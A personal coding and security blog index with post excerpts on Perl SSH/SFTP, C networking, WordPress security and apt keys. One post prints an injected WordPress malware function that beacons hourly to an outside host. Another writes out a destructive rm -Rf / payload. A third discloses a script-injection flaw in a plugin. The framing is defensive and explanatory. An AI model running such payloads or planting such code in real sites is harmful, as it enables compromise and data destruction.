Posts

Perl Net::SSH2::SFTP Example

In my experience, code has sometimes been better at explaining than documentation. Why did I do this? Because I didn't find it immediately when I searched for it... Cheers! Copy from PasteBin!

    #!/usr/bin/perl
    use strict;
    use warnings;
    use Data::Dumper;
    use Net::SSH2;
    use Net::SFTP;
    use Carp;
    use Fcntl;
    use Fcntl ':DEFAULT';

    use constant SSH_USER => 'root';
    use constant SSH_PASS => 'toor';
    use constant SSH_HOST => 'localhost';
    use constant SSH_PORT => 21;

    my ( $conn, $ssh, $sftp, $buf, $buffer, $len );

    # Open an SSH session and authenticate with a password.
    # Returns the Net::SSH2 object on success, 0 on any failure.
    sub ssh_connect {
        my ( $ssh, $user, $host, $pass, $port );
        ( $user, $pass, $host, $port ) = @_;
        $host ||= 'localhost';
        $port ||= 22;
        $ssh = Net::SSH2->new;
        $ssh->debug(1);
        $ssh->blocking(1);
        # Net::SSH2::connect takes host and port as separate arguments.
        return 0 unless $ssh->connect( $host, $port );
        print "[*] Connect OK!\n";
        return 0 unless $ssh->auth( username => $user, password => $pass );
        print "[*] Auth OK!\n";
        return $ssh;
    }
    sub ...

Get Address of a Network Interface in C

So, here I am searching the internet over and over again to find out how to easily and quickly get the IP address of a local interface, and there isn't an easy way to do it without running `ifconfig | grep | cut...` in some crazy fashion. So, here I've compiled a simple C program that iterates through your interfaces and prints the IP address of the one you name on the command line. Feel free to redistribute under the GNU GPL.

https://github.com/markizano/scripts/blob/master/getifaddr/getifaddr.c

    /*
     * This program is free software: you can redistribute it and/or modify
     * it under the terms of the GNU General Public License as published by
     * the Free Software Foundation, either version 3 of the License, or
     * (at your option) any later version.
     *
     * This program is distributed in the hope that it will be useful,
     * but WITHOUT ANY WARRANTY; without even the implied warranty of
     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
     * GNU Gene...

Specific Exploits

Malicious crackers don't care who you are. They prey and feed on the fact that you think you're so meaningless that you'll never be targeted. I came across this one exploit that was really interesting. Someone went to some great lengths to get this poor victim. The injected function hides a timestamp in the wp_options table and, once an hour, opens a connection to a remote host.

Code:

    function wp_get_footer_meta() {
        global $wpdb;
        if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))
            $adwb_opt = unserialize($adwb_opt);
        else {
            $adwb_opt = array( 0, '' );
            $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '" . serialize($adwb_opt) . "', 'no')");
        }
        if ((time() - $adwb_opt[0]) >= 3600) {
            $adwb_host = 'blogcell.net';
            $adwb_get = '/wpam/';
            $adwb_soc = @fsockopen($adwb_host, 80, $_en, $_es, 30);
            ...

Eval is Evil

Why? Because Kizano said so... Here are some examples I've seen in live code that just do not work (1 line each):

    $success = eval('?>' . $_GET['a']);
    eval("$my_obj->$key = $other_obj->$some_value");

I'm really surprised at some people. Do they not see the glaring a=<?php system("rm -Rf /"); in their URL? Just keep things easy on yourself and use this instead:

    $success = (string)$_GET['a'];
    $my_obj->$key = $other_obj->$some_value;

That way you don't give me a heart attack when I see you vulnerable to the most basic PHP exploit... Remember, PHP is smart enough to do what you want, but the real question is: are you l33t enough to write it? Eval is Evil!

EOF
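As an added example (not code from the original post), the same two eval() calls rewritten as plain PHP, with the property name checked against an allowlist before a variable property is assigned. The Settings class, WRITABLE_KEYS and the function names are assumptions.

```php
<?php
// Added example, not code from the original post: the two eval() calls the post
// quotes, rewritten without eval and with the checks a reviewer would expect.
// Settings, WRITABLE_KEYS and the function names are assumptions.
declare(strict_types=1);

final class Settings
{
    public string $title = '';
    public string $theme = 'default';
}

// Property names a request may set; anything else is refused, never evaluated.
const WRITABLE_KEYS = ['title', 'theme'];

// Replaces eval("$my_obj->$key = $other_obj->$some_value"): a variable property
// name is ordinary PHP syntax, so eval() buys nothing and only executes whatever
// the interpolated values happen to contain.
function copy_setting(Settings $target, object $source, string $key): bool
{
    if (!in_array($key, WRITABLE_KEYS, true) || !property_exists($source, $key)) {
        return false;
    }
    $target->$key = (string) $source->$key;
    return true;
}

// Replaces $success = eval('?>' . $_GET['a']): the parameter is read as a
// string, so PHP tags inside it are data, not code.
function read_param(array $query, string $name): string
{
    return isset($query[$name]) ? (string) $query[$name] : '';
}

// Constructed input standing in for $_GET and for $other_obj.
$query  = ['a' => '<?php echo "injected"; ?>', 'key' => 'theme', 'other' => 'password'];
$source = (object) ['theme' => 'dark', 'password' => 'secret'];
$target = new Settings();

echo read_param($query, 'a'), "\n";                        // printed as text, never run
var_dump(copy_setting($target, $source, $query['key']));   // 'theme' is writable
var_dump(copy_setting($target, $source, $query['other'])); // 'password' is refused
echo $target->theme, "\n";
```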

Wordpress Securepress Plugin Vulnerability

http://wordpress.org/extend/plugins/securepress-plugin/

While looking around in a Wordpress install, I found this little gem:

    line 2218: $back = isset($_POST['back']) ? $_POST['back'] : null;
    line 2349: <input type="button" value="Cancel" onclick="eval(\'memos.\'+\''.addcslashes($back,"'").'\')" />

$back is never properly escaped for JS... They should use json_encode instead. I can inject arbitrary JavaScript into a POST request for the "back" parameter and have it come out in your browser. Tested on plugin version 8.4.01.

-0xKizano
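An added example, not the plugin's code, of rendering the Cancel button without building JavaScript from the raw value: the name is validated as an identifier, json_encode() produces the JS literal, htmlspecialchars() protects the attribute, and the eval() is replaced by a property lookup. The function names, the default 'home' and the client-side "memos" object are assumptions.

```php
<?php
// Added example (not the plugin's code): rendering a user-supplied name into an
// inline event handler. Function names, the default 'home' and the client-side
// "memos" object are assumptions.
declare(strict_types=1);

// The plugin's approach, kept for comparison: only single quotes are escaped, so
// a backslash or a double quote in $back reaches the browser unchanged.
function cancel_button_unsafe(string $back): string
{
    return '<input type="button" value="Cancel" onclick="eval(\'memos.\'+\''
        . addcslashes($back, "'") . '\')" />';
}

// Hardened form. eval('memos.' + name) is just a property lookup, so it is
// written as memos[name] and eval() goes away. json_encode() on its own would
// not make eval() safe: whatever the string contained would still be evaluated.
function cancel_button_safe(string $back): string
{
    // The value names a property of "memos": accept only an identifier.
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $back)) {
        $back = 'home';
    }
    // json_encode() yields a JS string literal with quotes and backslashes
    // escaped; htmlspecialchars() then encodes it for the HTML attribute, which
    // the browser decodes before the JS parser sees it.
    $js = json_encode($back, JSON_THROW_ON_ERROR);
    return '<input type="button" value="Cancel" onclick="memos['
        . htmlspecialchars($js, ENT_QUOTES, 'UTF-8') . ']" />';
}

// Constructed inputs: a plain name, and a value containing the two characters
// addcslashes($back, "'") leaves alone.
foreach (['page2', 'a"b\\c'] as $back) {
    echo cancel_button_unsafe($back), "\n";
    echo cancel_button_safe($back), "\n";
}
```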

apt-get update; GPG Unverified Signature

So, you added a new thing to your /etc/apt/sources.list (or, if you're smarter than most, you created your own file in /etc/apt/sources.list.d/<new-source>.list), then you go to update your package lists, and you get the following message:

    root@localhost:~# apt-get update
    ...
    W: GPG error: http://updates.repository.backtrack-linux.org revolution Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY AB6DA34B475A6B7F

This is all fine and dandy - I can just go to the site and look for their key and install that, right? No? They don't just give me the key?! Then your packages will always be unverified and I'll be open to an exploit that allows the install of arbitrary third-party packages! Oh noes! D: Whatever shall we do? Never fear - there's a way to get that key and turn it into something apt-get can use and stop complaining about that error. Check out apt-get-key, which is a quick script that ...

Office View

Image
Here's the view I get from my office window: I love my job :3